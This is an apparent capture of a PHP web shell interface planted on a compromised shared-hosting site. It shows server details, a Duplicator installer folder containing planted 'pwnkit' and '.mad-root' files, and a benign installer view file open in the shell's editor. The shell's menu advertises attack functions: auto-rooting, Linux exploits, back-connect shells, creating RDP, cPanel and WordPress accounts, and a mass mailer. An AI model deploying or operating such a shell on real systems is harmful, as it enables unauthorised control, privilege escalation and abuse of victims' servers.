Linux webm001.cluster111.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.111.20.1 | : 216.73.216.115
Cant Read [ /etc/named.conf ]
7.4.33
osteocoeek
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
osteocoeek /
holistea.eu /
dup-installer /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
classes
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
index.php
15
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
view.api.php
2.69
KB
-rw-r--r--
view.exception.php
1.41
KB
-rw-r--r--
view.help.php
43.57
KB
-rw-r--r--
view.init1.php
2.15
KB
-rw-r--r--
view.s1.base.php
54.53
KB
-rw-r--r--
view.s2.base.php
20.54
KB
-rw-r--r--
view.s2.basic.php
4.16
KB
-rw-r--r--
view.s2.cpnl.php
13.59
KB
-rw-r--r--
view.s2.dbtest.php
24.49
KB
-rw-r--r--
view.s3.php
14.94
KB
-rw-r--r--
view.s4.php
17.79
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : view.exception.php
<?php /** * * Standard: PSR-2 * @link http://www.php-fig.org/psr/psr-2 Full Documentation * * @package SC\VIEWS * */ defined('ABSPATH') || defined('DUPXABSPATH') || exit; DUPX_U_Html::getHeaderMain('Exception error'); ?> <div id="ajaxerr-data"> <b style="color:#B80000;">INSTALL ERROR!</b> <p> Message: <b><?php echo DUPX_U::esc_html($exceptionError->getMessage()); ?></b><br> Please see the <?php DUPX_View_Funcs::installerLogLink(); ?> file for more details. <?php if ($exceptionError instanceof DupxException) { if ($exceptionError->haveFaqLink()) { ?> <br> See FAQ: <a href="<?php echo $exceptionError->getFaqLinkUrl(); ?>" ><?php echo $exceptionError->getFaqLinkLabel(); ?></a> <?php } if (strlen($longMsg = $exceptionError->getLongMsg())) { echo '<br><br>'.$longMsg; } } ?> </p> <hr> Trace: <pre class="exception-trace"><?php echo $exceptionError->getTraceAsString(); ?></pre> </div> <div style="text-align:center; margin:10px auto 0px auto"> <!--<input type="button" class="default-btn" onclick="DUPX.hideErrorResult()" value="« Try Again" /><br/><br/>--> <i style='font-size:11px'>See online help for more details at <a href='https://snapcreek.com/ticket' target='_blank'>snapcreek.com</a></i> </div>
Close